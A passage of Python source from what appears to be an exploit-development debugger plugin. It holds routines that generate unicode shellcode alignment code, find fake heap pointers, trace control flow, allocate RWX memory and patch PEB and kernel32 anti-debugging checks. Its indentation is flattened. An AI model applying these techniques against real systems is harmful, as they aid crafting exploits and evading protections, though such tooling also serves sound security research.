'add ch,ch': '\\x00\\xed', 'add cl,dl': '\\x00\\xd1', 'add al,cl': '\\x00\\xc8', 'add dh,bh': '\\x00\\xfe',
'add ch,cl': '\\x00\\xcd', 'add cl,dh': '\\x00\\xf1', 'add ch,ah': '\\x00\\xe5', 'add cl,bl': '\\x00\\xd9',
'add dh,al': '\\x00\\xc6', 'add ch,al': '\\x00\\xc5', 'add cl,bh': '\\x00\\xf9', 'add dh,ah': '\\x00\\xe6',
'add dl,dl': '\\x00\\xd2', 'add dh,cl': '\\x00\\xce', 'add dh,dl': '\\x00\\xd6', 'add ah,dh': '\\x00\\xf4',
'add dh,dh': '\\x00\\xf6', 'add ah,dl': '\\x00\\xd4', 'add ah,bh': '\\x00\\xfc', 'add ah,bl': '\\x00\\xdc',
'add bl,bh': '\\x00\\xfb', 'add bh,al': '\\x00\\xc7', 'add bl,dl': '\\x00\\xd3', 'add bl,bl': '\\x00\\xdb',
'add bh,ah': '\\x00\\xe7', 'add bl,dh': '\\x00\\xf3', 'add bh,bl': '\\x00\\xdf', 'add al,bl': '\\x00\\xd8',
'add bh,bh': '\\x00\\xff', 'add al,bh': '\\x00\\xf8', 'add al,dl': '\\x00\\xd0', 'add dl,ch': '\\x00\\xea',
'add dl,al': '\\x00\\xc2', 'add al,dh': '\\x00\\xf0', 'add cl,cl': '\\x00\\xc9', 'add cl,ch': '\\x00\\xe9',
'add ch,bh': '\\x00\\xfd', 'add cl,al': '\\x00\\xc1', 'add ch,dh': '\\x00\\xf5', 'add cl,ah': '\\x00\\xe1',
'add dh,ch': '\\x00\\xee', 'add ch,dl': '\\x00\\xd5', 'add ch,ah': '\\x00\\xe5', 'mov dh,0': '\\xb6\\x00',
'add dl,ah': '\\x00\\xe2', 'mov dl,0': '\\xb2\\x00', 'mov ch,0': '\\xb5\\x00', 'mov cl,0': '\\xb1\\x00',
'mov bh,0': '\\xb7\\x00', 'add bl,ah': '\\x00\\xe3', 'mov bl,0': '\\xb3\\x00', 'add dh,ah': '\\x00\\xe6',
'add cl,ah': '\\x00\\xe1', 'add bh,ah': '\\x00\\xe7'}
for example_instr, example_op in [("mov eax,0x41004300", "\\xb8\\x00\\x43\\x00\\x41"),
("mov ebx,0x4100af00", "\\xbb\\x00\\xaf\\x00\\x41"),
("mov ecx,0x41004300", "\\xb9\\x00\\x43\\x00\\x41"),
("mov edx,0x41004300", "\\xba\\x00\\x43\\x00\\x41")]:
for i in range(0,256):
padding =""
if i < 16:
padding = "0"
new_instr = example_instr[:14]+padding+hex(i)[2:]+example_instr[16:]
new_op = example_op[:10]+padding+hex(i)[2:]+example_op[12:]
ass_operation[new_instr] = new_op
res = ""
for instr in inputInstr.split("; "):
if instr in ass_operation:
res += ass_operation[instr].replace("\\x00","")
elif instr.strip():
warn(" Couldn't find metasm assembly for %s" % str(instr))
warn(" You have to manually convert it in the metasm shell")
res += "<"+instr+">"
return res
def getCyclic(originals):
cyclic = [0 for i in range(0,len(originals))]
for index, orig_num in enumerate(originals):
cycle = 1
num = orig_num
while True:
cycle += 1
num += orig_num
num = num % 256
if num == orig_num:
cyclic[index] = cycle
break
return cyclic
def hexlist(lis):
return [hex(i) for i in lis]
def theX(num):
res = (num>>16)<<16 ^ num
return res
def higher(num):
res = num>>8
return res
def lower(num):
res = ((num>>8)<<8) ^ num
return res
def info(*text):
dbg.log(" ".join(str(i) for i in text))
def warn(*text):
dbg.log(" ".join(str(i) for i in text), highlight=1)
def debug(*text):
if False:
dbg.log(" ".join(str(i) for i in text))
buffer_registers_4_byte_names = [bufferRegister[1]+"h", bufferRegister[1]+"l"]
buffer_registers_4_byte_value = theX(registers[bufferRegister])
MAGIC_PROBABILITY_OF_ADDING_AN_ELEMENT_FROM_INPUTS=0.25
MAGIC_PROBABILITY_OF_RESETTING=0.04
MAGIC_MAX_PROBABILITY_OF_RESETTING=0.11
originals = []
ax = theX(registers["eax"])
ah = higher(ax)
al = lower(ax)
bx = theX(registers["ebx"])
bh = higher(bx)
bl = lower(bx)
cx = theX(registers["ecx"])
ch = higher(cx)
cl = lower(cx)
dx = theX(registers["edx"])
dh = higher(dx)
dl = lower(dx)
start_address = theX(buffer_registers_4_byte_value)
s1 = higher(start_address)
s2 = lower(start_address)
alignment_code_loc_address = theX(alignment_code_loc)
g1 = higher(alignment_code_loc_address)
g2 = lower(alignment_code_loc_address)
names = ['ah', 'al', 'bh', 'bl', 'ch', 'cl', 'dh', 'dl']
originals = [ah, al, bh, bl, ch, cl, dh, dl]
sanitiseZeros(originals, names)
checkDuplicates(originals, names)
best_result = checkHigherByteBufferRegisterForOverflow(g1, buffer_registers_4_byte_names[0], g2)
xs = [0 for i in range(0,len(originals))]
ys = [0 for i in range(0,len(originals))]
cyclic = getCyclic(originals)
mul = 1
for i in cyclic:
mul *= i
if not silent:
dbg.log("[+] Searching for random solutions for code alignment code in at least %i possibilities..." % mul)
dbg.log(" Bufferregister: %s" % bufferRegister)
dbg.log(" Max time: %d seconds" % timeToRun)
dbg.log("")
#We can't even know the value of AH yet (no, it's NOT g1 for high instruction counts)
cyclic2 = copy.copy(cyclic)
cyclic2[names.index(buffer_registers_4_byte_names[0])] = 9999999
number_of_tries = 0.0
beginning = time.time()
resultFound = False
resultcnt = 0
while time.time()-beginning < timeToRun: #Run only timeToRun seconds!
randomise(xs, cyclic)
randomise(ys, cyclic2)
#[Extra constraint!]
#not allowed: all operations with the bufferRegister,
#because we can not rely on it's values, e.g.
#add al, al
#add al, ah
#add ah, ah
#add ah, al
xs[names.index(buffer_registers_4_byte_names[0])] = 0
xs[names.index(buffer_registers_4_byte_names[1])] = 0
ys[names.index(buffer_registers_4_byte_names[0])] = 0
ys[names.index(buffer_registers_4_byte_names[1])] = 0
tmp = check(originals, names.index(buffer_registers_4_byte_names[0]), [s1, s2], [g1, g2], xs, ys, additionalLength, best_result)
if tmp > 0:
best_result = tmp
#we got a new result
resultFound = True
alignresults[resultcnt] = printNicely(names, buffer_registers_4_byte_names, xs, ys, additionalLength, prefix, postfix)
resultcnt += 1
if not silent:
dbg.log(" Time elapsed so far: %s seconds" % (time.time()-beginning))
dbg.log("")
#Slightly increases probability of resetting with time
probability = MAGIC_PROBABILITY_OF_RESETTING+number_of_tries/(10**8)
if probability < MAGIC_MAX_PROBABILITY_OF_RESETTING:
number_of_tries += 1.0
if random.random() <= probability:
xs = [0 for i in range(0,len(originals))]
ys = [0 for i in range(0,len(originals))]
if not silent:
dbg.log("")
dbg.log(" Done. Total time elapsed: %s seconds" % (time.time()-beginning))
if not resultFound:
dbg.log("")
dbg.log("No results. Please try again (you might want to increase -t)")
dbg.log("")
dbg.log("If you are unsatisfied with the result, run the command again and use the -t option")
dbg.log("")
return alignresults
# end unicode alignemt routines
def procHeapCookie(args):
# first find all writeable pages
allpages = dbg.getMemoryPages()
filename="heapcookie.txt"
orderedpages = []
cookiemonsters = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
for thispage in orderedpages:
page = allpages[thispage]
page_base = page.getBaseAddress()
page_size = page.getSize()
page_end = page_base + page_size
acl = page.getAccess(human=True)
if "WRITE" in acl:
processpage = True
# don't even bother if page belongs to module that is ASLR/Rebased
pageptr = MnPointer(page_base)
thismodulename = pageptr.belongsTo()
if thismodulename != "":
thismod = MnModule(thismodulename)
if thismod.isAslr or thismod.isRebase:
processpage = False
if processpage:
dbg.log("[+] Walking page 0x%08x - 0x%08x (%s)" % (page_base,page_end,acl))
startptr = page_base # we need to start here
while startptr < page_end-16:
# pointer needs to pass 3 tests
try:
heap_entry = startptr
userptr = heap_entry + 0x8
cookieptr = heap_entry + 5
raw_heapcookie = dbg.readMemory(cookieptr,1)
heapcookie = struct.unpack("<B",raw_heapcookie)[0]
hexptr1 = "%08x" % userptr
hexptr2 = "%08x" % heapcookie
a1 = hexStrToInt(hexptr1[6:])
a2 = hexStrToInt(hexptr2[6:])
test1 = False
test2 = False
test3 = False
if (a1 & 7) == 0:
test1 = True
if (a2 & 1) == 1:
test2 = True
if (a2 & 8) == 8:
test3 = True
if test1 and test2 and test3:
cookiemonsters.append(startptr+0x8)
except:
pass
startptr += 1
dbg.log("")
if len(cookiemonsters) > 0:
# write to log
dbg.log("Found %s (fake) UserPtr pointers." % len(cookiemonsters))
all_ptrs = {}
all_ptrs[""] = cookiemonsters
logfile = MnLog(filename)
thislog = logfile.reset()
processResults(all_ptrs,logfile,thislog)
else:
dbg.log("Bad luck, no results.")
return
def procFlags(args):
currentflag = getNtGlobalFlag()
dbg.log("[+] NtGlobalFlag: 0x%08x" % currentflag)
flagvalues = getNtGlobalFlagValues(currentflag)
if len(flagvalues) == 0:
dbg.log(" No GFlags set")
else:
for flagvalue in flagvalues:
dbg.log(" 0x%08x : %s" % (flagvalue,getNtGlobalFlagValueName(flagvalue)))
return
def procEval(args):
# put all args together
argline = ""
if len(currentArgs) > 1:
if __DEBUGGERAPP__ == "WinDBG":
for a in currentArgs[2:]:
argline += a
else:
for a in currentArgs[1:]:
argline += a
argline = argline.replace(" ","")
if argline.replace(" ","") != "":
dbg.log("[+] Evaluating expression '%s'" % argline)
val,valok = getAddyArg(argline)
if valok:
dbg.log(" Result: 0x%08x" % val)
else:
dbg.log(" *** Unable to evaluate expression ***")
else:
dbg.log(" *** No expression found***")
return
def procDiffHeap(args):
global ignoremodules
filenamebefore = "heapstate_before.db"
filenameafter = "heapstate_after.db"
ignoremodules = True
statefilebefore = MnLog(filenamebefore)
thisstatefilebefore = statefilebefore.reset(clear=False)
statefileafter = MnLog(filenameafter)
thisstatefileafter = statefileafter.reset(clear=False)
ignoremodules = False
beforestate = {}
afterstate = {}
#do we want to save states, or diff them?
if not "before" in args and not "after" in args and not "diff" in args:
dbg.log("*** Missing mandatory argument -before, -after or -diff ***", highlight=1)
return
if "diff" in args:
# check if before and after state file exists
if os.path.exists(thisstatefilebefore) and os.path.exists(thisstatefileafter):
# read contents from both states into dict
dbg.log("[+] Reading 'before' state from %s" % thisstatefilebefore)
beforestate = readPickleDict(thisstatefilebefore)
dbg.log("[+] Reading 'after' state from %s" % thisstatefileafter)
afterstate = readPickleDict(thisstatefileafter)
# compare
dbg.log("[+] Diffing heap states...")
else:
if not os.path.exists(thisstatefilebefore):
dbg.log("[-] Oops, unable to find 'before' state file %s" % thisstatefilebefore)
if not os.path.exists(thisstatefileafter):
dbg.log("[-] Oops, unable to find 'after' state file %s" % thisstatefileafter)
return
elif "before" in args:
thisstatefilebefore = statefilebefore.reset(showheader=False)
dbg.log("[+] Enumerating current heap layout, please wait...")
currentstate = getCurrentHeapState()
dbg.log("[+] Saving current heap layout to 'before' heap state file %s" % thisstatefilebefore)
# save dict to file
try:
writePickleDict(thisstatefilebefore, currentstate)
dbg.log("[+] Done")
except:
dbg.log("[-] Error while saving current state to file")
return
elif "after" in args:
thisstatefileafter = statefileafter.reset(showheader=False)
dbg.log("[+] Enumerating current heap layout, please wait...")
currentstate = getCurrentHeapState()
dbg.log("[+] Saving current heap layout to 'after' heap state file %s" % thisstatefileafter)
try:
writePickleDict(thisstatefileafter, currentstate)
dbg.log("[+] Done")
except:
dbg.log("[-] Error while saving current state to file")
return
return
def procFlow(args):
srplist = []
endlist = []
cregs = []
cregsc = []
avoidlist = []
endloc = 0
rellist = {}
funcnamecache = {}
branchstarts = {}
maxinstr = 60
maxcalllevel = 3
callskip = 0
instrcnt = 0
regs = dbg.getRegs()
aregs = getAllRegs()
addy = regs["EIP"]
addyerror = False
eaddy = 0
showfuncposition = False
if "cl" in args:
if type(args["cl"]).__name__.lower() != "bool":
try:
maxcalllevel = int(args["cl"])
except:
pass
if "cs" in args:
if type(args["cs"]).__name__.lower() != "bool":
try:
callskip = int(args["cs"])
except:
pass
if "avoid" in args:
if type(args["avoid"]).__name__.lower() != "bool":
try:
avoidl = args["avoid"].replace("'","").replace('"',"").replace(" ","").split(",")
for aa in avoidl:
a,aok = getAddyArg(aa)
if aok:
if not a in avoidlist:
avoidlist.append(a)
except:
pass
if "cr" in args:
if type(args["cr"]).__name__.lower() != "bool":
crdata = args["cr"]
crdata = crdata.replace("'","").replace('"',"").replace(" ","")
crlist = crdata.split(",")
for c in crlist:
c1 = c.upper()
if c1 in aregs:
cregs.append(c1)
csmall = getSmallerRegs(c1)
for cs in csmall:
cregs.append(cs)
if "crc" in args:
if type(args["crc"]).__name__.lower() != "bool":
crdata = args["crc"]
crdata = crdata.replace("'","").replace('"',"").replace(" ","")
crlist = crdata.split(",")
for c in crlist:
c1 = c.upper()
if c1 in aregs:
cregsc.append(c1)
csmall = getSmallerRegs(c1)
for cs in csmall:
cregsc.append(cs)
cregs = list(set(cregs))
cregsc = list(set(cregsc))
if "n" in args:
if type(args["n"]).__name__.lower() != "bool":
try:
maxinstr = int(args["n"])
except:
pass
if "func" in args:
showfuncposition = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log(" ** Please provide a valid start location with argument -a **")
return
if "e" in args:
if type(args["e"]).__name__.lower() != "bool":
eaddy,eaddyok = getAddyArg(args["e"])
if not eaddyok:
dbg.log(" ** Please provide a valid end location with argument -e **")
return
dbg.log("[+] Max nr of instructions per branch: %d" % maxinstr)
dbg.log("[+] Maximum CALL level: %d" % maxcalllevel)
if len(avoidlist) > 0:
dbg.log("[+] Only showing flows that don't contains these pointer(s):")
for a in avoidlist:
dbg.log(" 0x%08x" % a)
if callskip > 0:
dbg.log("[+] Skipping details of the first %d child functions" % callskip)
if eaddy > 0:
dbg.log("[+] Searching all possible paths between 0x%08x and 0x%08x" % (addy,eaddy))
else:
dbg.log("[+] Searching all possible paths from 0x%08x" % (addy))
if len(cregs) > 0:
dbg.log("[+] Controlled registers: %s" % cregs)
if len(cregsc) > 0:
dbg.log("[+] Controlled register contents: %s" % cregsc)
# first, get SRPs at this point
if addy == regs["EIP"]:
cmd2run = "k"
srpdata = dbg.nativeCommand(cmd2run)
for line in srpdata.split("\n"):
linedata = line.split(" ")
if len(linedata) > 1:
childebp = linedata[0]
srp = linedata[1]
if isAddress(childebp) and isAddress(srp):
srplist.append(hexStrToInt(srp))
branchstarts[addy] = [0,srplist,0]
curlocs = [addy]
# create relations
while len(curlocs) > 0:
curloc = curlocs.pop(0)
callcnt = 0
#dbg.log("New start location: 0x%08x" % curloc)
prevloc = curloc
instrcnt = branchstarts[curloc][0]
srplist = branchstarts[curloc][1]
currcalllevel = branchstarts[curloc][2]
while instrcnt < maxinstr:
beforeloc = prevloc
prevloc = curloc
try:
thisopcode = dbg.disasm(curloc)
instruction = getDisasmInstruction(thisopcode)
instructionbytes = thisopcode.getBytes()
instructionsize = thisopcode.opsize
opupper = instruction.upper()
if opupper.startswith("RET"):
if currcalllevel > 0:
currcalllevel -= 1
if len(srplist) > 0:
newloc = srplist.pop(0)
rellist[curloc] = [newloc]
curloc = newloc
else:
break
elif opupper.startswith("JMP"):
if "(" in opupper and ")" in opupper:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
rellist[curloc] = [newloc]
curloc = newloc
elif opupper.startswith("J"):
if "(" in opupper and ")" in opupper:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
if not newloc in curlocs:
curlocs.append(newloc)
branchstarts[newloc] = [instrcnt,srplist,currcalllevel]
newloc2 = prevloc + instructionsize
rellist[curloc] = [newloc,newloc2]
curloc = newloc2
#dbg.log(" Added 0x%08x as alternative branch start" % newloc)
elif opupper.startswith("CALL"):
if ("(" in opupper and ")" in opupper) and currcalllevel < maxcalllevel and callcnt > callskip:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
rellist[curloc] = [newloc]
curloc = newloc
newretptr = prevloc + instructionsize
srplist.insert(0,newretptr)
currcalllevel += 1
else:
# don't show the function details, simply continue after the call
newloc = curloc+instructionsize
rellist[curloc] = [newloc]
curloc = newloc
callcnt += 1
else:
curloc += instructionsize
rellist[prevloc] = [curloc]
except:
#dbg.log("Unable to disasm at 0x%08x, past: 0x%08x" % (curloc,beforeloc))
if not beforeloc in endlist:
endlist.append(beforeloc)
instrcnt = maxinstr
break
#dbg.log("%d 0x%08x : %s -> 0x%08x" % (instrcnt,prevloc,instruction,curloc))
instrcnt += 1
if not curloc in endlist:
endlist.append(curloc)
dbg.log("[+] Found total of %d possible flows" % len(endlist))
if eaddy > 0:
if eaddy in rellist:
endlist = [eaddy]
dbg.log("[+] Limit flows to cases that contain 0x%08x" % eaddy)
else:
dbg.log(" ** Unable to reach 0x%08x ** " % eaddy)
dbg.log(" Try increasing max nr of instructions with parameter -n")
return
filename = "flows.txt"
logfile = MnLog(filename)
thislog = logfile.reset()
dbg.log("[+] Processing %d endings" % len(endlist))
endingcnt = 1
processedresults = []
for endaddy in endlist:
dbg.log("[+] Creating all paths between 0x%08x and 0x%08x" % (addy,endaddy))
allpaths = findAllPaths(rellist,addy,endaddy)
if len(allpaths) == 0:
#dbg.log(" *** No paths from 0x%08x to 0x%08x *** " % (addy,endaddy))
continue
dbg.log("[+] Ending: 0x%08x (%d/%d), %d paths" % (endaddy,endingcnt,len(endlist), len(allpaths)))
endingcnt += 1
for p in allpaths:
if p in processedresults:
dbg.log(" > Skipping duplicate path from 0x%08x to 0x%08x" % (addy,endaddy))
else:
processedresults.append(p)
skipthislist = False
logl = "Path from 0x%08x to 0x%08x (%d instructions) :" % (addy,endaddy,len(p))
if len(avoidlist) > 0:
for a in avoidlist:
if a in p:
dbg.log(" > Skipping path, contains 0x%08x (which should be avoided)"%a)
skipthislist = True
break
if not skipthislist:
logfile.write("\n",thislog)
logfile.write(logl,thislog)
logfile.write("-" * len(logl),thislog)
dbg.log(" > Simulating path from 0x%08x to 0x%08x (%d instructions)" % (addy,endaddy,len(p)))
cregsb = []
for c in cregs:
cregsb.append(c)
cregscb = []
for c in cregsc:
cregscb.append(c)
prevfname = ""
fname = ""
foffset = ""
previnstruction = ""
for thisaddy in p:
if showfuncposition:
if previnstruction == "" or previnstruction.startswith("RET") or previnstruction.startswith("J") or previnstruction.startswith("CALL"):
if not thisaddy in funcnamecache:
fname,foffset = getFunctionName(thisaddy)
funcnamecache[thisaddy] = [fname,foffset]
else:
fname = funcnamecache[thisaddy][0]
foffset = funcnamecache[thisaddy][1]
if fname != prevfname:
prevfname = fname
locname = fname
if foffset != "":
locname += "+%s" % foffset
logfile.write("#--- %s ---" % locname,thislog)
#dbg.log("%s" % locname)
thisopcode = dbg.disasm(thisaddy)
instruction = getDisasmInstruction(thisopcode)
previnstruction = instruction
clist = []
clistc = []
for c in cregsb:
combins = []
combins.append(" %s" % c)
combins.append("[%s" % c)
combins.append(",%s" % c)
combins.append("%s]" % c)
combins.append("%s-" % c)
combins.append("%s+" % c)
combins.append("-%s" % c)
combins.append("+%s" % c)
for comb in combins:
if comb in instruction and not c in clist:
clist.append(c)
for c in cregscb:
combins = []
combins.append(" %s" % c)
combins.append("[%s" % c)
combins.append(",%s" % c)
combins.append("%s]" % c)
combins.append("%s-" % c)
combins.append("%s+" % c)
combins.append("-%s" % c)
combins.append("+%s" % c)
for comb in combins:
if comb in instruction and not c in clistc:
clistc.append(c)
rsrc,rdst = getSourceDest(instruction)
csource = False
cdest = False
if rsrc in cregsb or rsrc in cregscb:
csource = True
if rdst in cregsb or rdst in cregscb:
cdest = True
destructregs = ["MOV","XOR","OR"]
writeregs = ["INC","DEC","AND"]
ocregsb = copy.copy(cregsb)
if not instruction.startswith("TEST") and not instruction.startswith("CMP"):
for d in destructregs:
if instruction.startswith(d):
sourcefound = False
sourcereg = ""
destfound = False
destreg = ""
for s in clist:
for sr in rsrc:
if s in sr and not sourcefound:
sourcefound = True
sourcereg = s
for sr in rdst:
if s in sr and not destfound:
destfound = True
destreg = s
if sourcefound and destfound:
if not destreg in cregsb:
cregsb.append(destreg)
if destfound and not sourcefound:
sregs = getSmallerRegs(destreg)
if destreg in cregsb:
cregsb.remove(destreg)
for s in sregs:
if s in cregsb:
cregsb.remove(s)
break
#else:
#dbg.log(" Control: %s" % ocregsb)
logfile.write("0x%08x : %s" % (thisaddy,instruction),thislog)
#if len(cregs) > 0 or len(cregsb) > 0:
# if cmp(ocregsb,cregsb) == -1:
# dbg.log(" Before: %s" % ocregsb)
# dbg.log(" After : %s" % cregsb)
return
def procChangeACL(args):
size = 1
addy = 0
acl = ""
addyerror = False
aclerror = False
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
if "acl" in args:
if type(args["acl"]).__name__.lower() != "bool":
if args["acl"].upper() in memProtConstants:
acl = args["acl"].upper()
else:
aclerror = True
else:
aclerror = True
if addyerror:
dbg.log(" *** Please specify a valid address to argument -a ***")
if aclerror:
dbg.log(" *** Please specify a valid memory protection constant with -acl ***")
dbg.log(" *** Valid values are :")
for acltype in memProtConstants:
dbg.log(" %s (%s = 0x%02x)" % (toSize(acltype,10),memProtConstants[acltype][0],memProtConstants[acltype][1]))
if not addyerror and not aclerror:
pageacl = memProtConstants[acl][1]
pageaclname = memProtConstants[acl][0]
dbg.log("[+] Current ACL: %s" % getPointerAccess(addy))
dbg.log("[+] Desired ACL: %s (0x%02x)" % (pageaclname,pageacl))
retval = dbg.rVirtualAlloc(addy,1,0x1000,pageacl)
return
def procToBp(args):
"""
Generate WinDBG syntax to create a logging breakpoint on a given location
"""
addy = 0
addyerror = False
executenow = False
locsyntax = ""
regsyntax = ""
poisyntax = ""
dmpsyntax = ""
instructionparts = []
global silent
oldsilent = silent
regs = dbg.getRegs()
silent = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
else:
addy = regs["EIP"]
if "e" in args:
executenow = True
if addyerror:
dbg.log(" *** Please provide a valid address with argument -a ***",highlight=1)
return
# get RVA for addy (or absolute address if addy is not part of a module)
bpdest = "0x%08x" % addy
instruction = ""
ptrx = MnPointer(addy)
modname = ptrx.belongsTo()
if not modname == "":
mod = MnModule(modname)
m = mod.moduleBase
rva = addy - m
bpdest = "%s+0x%02x" % (modname,rva)
thisopcode = dbg.disasm(addy)
instruction = getDisasmInstruction(thisopcode)
locsyntax = "bp %s" % bpdest
instructionparts = multiSplit(instruction,[" ",","])
usedregs = []
for reg in regs:
for ipart in instructionparts:
if reg.upper() in ipart.upper():
usedregs.append(reg)
if len(usedregs) > 0:
regsyntax = '.printf \\"'
argsyntax = ""
for ipart in instructionparts:
for reg in regs:
if reg.upper() in ipart.upper():
if "[" in ipart:
regsyntax += ipart.replace("[","").replace("]","")
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart.replace("[","").replace("]","")
regsyntax += ipart
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart.replace("[","poi(").replace("]",")")
iparttxt = ipart.replace("[","").replace("]","")
dmpsyntax += ".echo;.echo %s:;dds %s L 0x24/4;" % (iparttxt,iparttxt)
else:
regsyntax += ipart
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart
argsyntax = argsyntax.strip(",")
regsyntax = regsyntax.strip(", ")
regsyntax += '\\",%s;' % argsyntax
if "CALL" in instruction.upper():
dmpsyntax += '.echo;.printf \\"Stack (esp: 0x%08x):\\",esp;.echo;dds esp L 0x4;'
if instruction.upper().startswith("RET"):
dmpsyntax += '.echo;.printf \\"EAX: 0x%08x, Ret To: 0x%08x, Arg1: 0x%08x, Arg2: 0x%08x, Arg3: 0x%08x, Arg4: 0x%08x\\",eax,poi(esp),poi(esp+4),poi(esp+8),poi(esp+c),poi(esp+10);'
bpsyntax = locsyntax + ' ".echo ---------------;u eip L 1;' + regsyntax + dmpsyntax + ".echo;g" + '"'
filename = "logbps.txt"
logfile = MnLog(filename)
thislog = logfile.reset(False,False)
with open(thislog, "a") as fh:
fh.write(bpsyntax + "\n")
silent = oldsilent
dbg.log("%s" % bpsyntax)
dbg.log("Updated %s" % thislog)
if executenow:
dbg.nativeCommand(bpsyntax)
dbg.log("> Breakpoint set at 0x%08x" % addy)
return
def procAllocMem(args):
size = 0x1000
addy = 0
sizeerror = False
addyerror = False
byteerror = False
fillup = False
writemore = False
fillbyte = "A"
acl = "RWX"
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
sval = args["s"]
if sval.lower().startswith("0x"):
try:
size = int(sval,16)
except:
sizeerror = True
else:
try:
size = int(sval)
except:
sizeerror = True
else:
sizeerror = True
if "b" in args:
if type(args["b"]).__name__.lower() != "bool":
try:
fillbyte = hex2bin(args["b"])[0]
except:
dbg.log(" *** Invalid byte specified with -b ***")
byteerror = True
if size < 0x1:
sizeerror = True
dbg.log(" *** Minimum size is 0x1 bytes ***",highlight=1)
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
if "fill" in args:
fillup = True
if "force" in args:
writemore = True
aclerror = False
if "acl" in args:
if type(args["acl"]).__name__.lower() != "bool":
if args["acl"].upper() in memProtConstants:
acl = args["acl"].upper()
else:
aclerror = True
dbg.log(" *** Please specify a valid memory protection constant with -acl ***")
dbg.log(" *** Valid values are :")
for acltype in memProtConstants:
dbg.log(" %s (%s = 0x%02x)" % (toSize(acltype,10),memProtConstants[acltype][0],memProtConstants[acltype][1]))
if addyerror:
dbg.log(" *** Please specify a valid address with -a ***",highlight=1)
if sizeerror:
dbg.log(" *** Please specify a valid size with -s ***",highlight = 1)
if not addyerror and not sizeerror and not byteerror and not aclerror:
dbg.log("[+] Requested allocation size: 0x%08x (%d) bytes" % (size,size))
if addy > 0:
dbg.log("[+] Desired target location : 0x%08x" % addy)
pageacl = memProtConstants[acl][1]
pageaclname = memProtConstants[acl][0]
if addy > 0:
dbg.log(" Current page ACL: %s" % getPointerAccess(addy))
dbg.log(" Desired page ACL: %s (0x%02x)" % (pageaclname,pageacl))
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
allocat = dbg.rVirtualAlloc(addy,size,0x1000,pageacl)
if addy == 0 and allocat > 0:
retval = dbg.rVirtualProtect(allocat,1,pageacl)
else:
retval = dbg.rVirtualProtect(addy,1,pageacl)
dbg.log("[+] Allocated memory at 0x%08x" % allocat)
#if allocat > 0:
# dbg.log(" ACL 0x%08x: %s" % (allocat,getPointerAccess(allocat)))
#else:
# dbg.log(" ACL 0x%08x: %s" % (addy,getPointerAccess(addy)))
if allocat == 0 and fillup and not writemore:
dbg.log("[+] It looks like the page was already mapped. Use the -force argument")
dbg.log(" to make me write to 0x%08x anyway" % addy)
if (allocat > 0 and fillup) or (writemore and fillup):
loc = 0
written = 0
towrite = size
while loc < towrite:
try:
dbg.writeMemory(addy+loc,fillbyte)
written += 1
except:
pass
loc += 1
dbg.log("[+] Wrote %d times \\x%s to chunk at 0x%08x" % (written,bin2hex(fillbyte),addy))
return
def procHideDebug(args):
peb = dbg.getPEBAddress()
dbg.log("[+] Patching PEB (0x%08x)" % peb)
if peb == 0:
dbg.log("** Unable to find PEB **")
return
isdebugged = struct.unpack('<B',dbg.readMemory(peb + 0x02,1))[0]
processheapflag = dbg.readLong(peb + 0x18)
processheapflag += 0x10
processheapvalue = dbg.readLong(processheapflag)
ntglobalflag = dbg.readLong(peb + 0x68)
dbg.log(" Patching PEB.IsDebugged : 0x%x -> 0x%x" % (isdebugged,0))
dbg.writeMemory(peb + 0x02, '\x00')
dbg.log(" Patching PEB.ProcessHeap.Flag : 0x%x -> 0x%x" % (processheapvalue,0))
dbg.writeLong(processheapflag,0)
dbg.log(" Patching PEB.NtGlobalFlag : 0x%x -> 0x%x" % (ntglobalflag,0))
dbg.writeLong(peb + 0x68, 0)
dbg.log(" Patching PEB.LDR_DATA Fill pattern")
a = dbg.readLong(peb + 0xc)
while a != 0:
a += 1
try:
b = dbg.readLong(a)
c = dbg.readLong(a + 4)
if (b == 0xFEEEFEEE) and (c == 0xFEEEFEEE):
dbg.writeLong(a,0)
dbg.writeLong(a + 4,0)
a += 7
except:
break
uef = dbg.getAddress("kernel32.UnhandledExceptionFilter")
if uef > 0:
dbg.log("[+] Patching kernel32.UnhandledExceptionFilter (0x%08x)" % uef)
uef += 0x86
dbg.writeMemory(uef, dbg.assemble(" \
PUSH EDI \
"))
else:
dbg.log("[-] Failed to hook kernel32.UnhandledExceptionFilter (0x%08x)")
remdebpres = dbg.getAddress("kernel32.CheckRemoteDebuggerPresent")
if remdebpres > 0:
dbg.log("[+] Patching CheckRemoteDebuggerPresent (0x%08x)" % remdebpres)
dbg.writeMemory( remdebpres, dbg.assemble( " \
MOV EDI, EDI \n \
PUSH EBP \n \
MOV EBP, ESP \n \
MOV EAX, [EBP + C] \n \
PUSH 0 \n \
POP [EAX] \n \
XOR EAX, EAX \n \
POP EBP \n \
RET 8 \
" ) )
else:
dbg.log("[-] Unable to patch CheckRemoteDebuggerPresent")
gtc = dbg.getAddress("kernel32.GetTickCount")
if gtc > 0:
dbg.log("[+] Patching GetTickCount (0x%08x)" % gtc)
patch = dbg.assemble("MOV EDX, 0x7FFE0000") + Poly_ReturnDW(0x0BADF00D) + dbg.assemble("Ret")
while len(patch) > 0x0F:
patch = dbg.assemble("MOV EDX, 0x7FFE0000") + Poly_ReturnDW(0x0BADF00D) + dbg.assemble("Ret")
dbg.writeMemory( gtc, patch )
else:
dbg.log("[-] Unable to pach GetTickCount")
